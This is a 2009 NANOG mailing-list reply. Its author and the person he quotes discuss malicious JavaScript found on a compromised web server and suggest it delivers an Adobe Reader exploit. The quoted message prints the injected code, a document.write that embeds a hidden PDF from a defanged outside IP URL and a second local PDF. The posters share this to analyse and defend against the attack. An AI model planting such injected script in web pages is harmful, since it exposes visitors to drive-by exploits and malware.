Malicious code just found on web server
Paul Ferguson
fergdawgster at gmail.com
Fri Apr 17 22:15:52 UTC 2009
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
On Fri, Apr 17, 2009 at 3:06 PM, Chris Mills <securinate at gmail.com> wrote:
> I took a quick look at the code... formatted it in a pastebin here:
> http://pastebin.com/m7b50be54
>
> That javascript writes this to the page (URL obscured):
> document.write("<embed
> src=\"hXXp://77.92.158.122/webmail/inc/web/include/spl.php?stat=Unknown|U
> nknown|US|1.2.3.4\" width=\"0\" height=\"0\"
> type=\"application/pdf\"></embed>");
>
> The 1.2.3.4 in the URL is my public IP address (I changed that).
>
> Below the javascript, it grabs a PDF:
> <embed src="include/two.pdf" width="1" height="0"
> style="border:none"></embed>
>
> That PDF is on the site, I haven't looked at it yet though.
>
Most likely a file that exploits a well-known vulnerability in Adobe
Reader, which in turn probably loads malware from yet another location.
We've been seeing a lot of this lately.
- - ferg
-----BEGIN PGP SIGNATURE-----
Version: PGP Desktop 9.5.3 (Build 5003)
wj8DBQFJ6P+Oq1pz9mNUZTMRAgINAJ9nFvTfdP0nNB5IXGCR5U5MKvbBxwCgoZQZ
1dYwVrqBqq9k7RVzAhXtYMY=
=bmbW
-----END PGP SIGNATURE-----
--
"Fergie", a.k.a. Paul Ferguson
Engineering Architecture for the Internet
fergdawgster(at)gmail.com
ferg's tech blog: http://fergdawg.blogspot.com/
More information about the NANOG
mailing list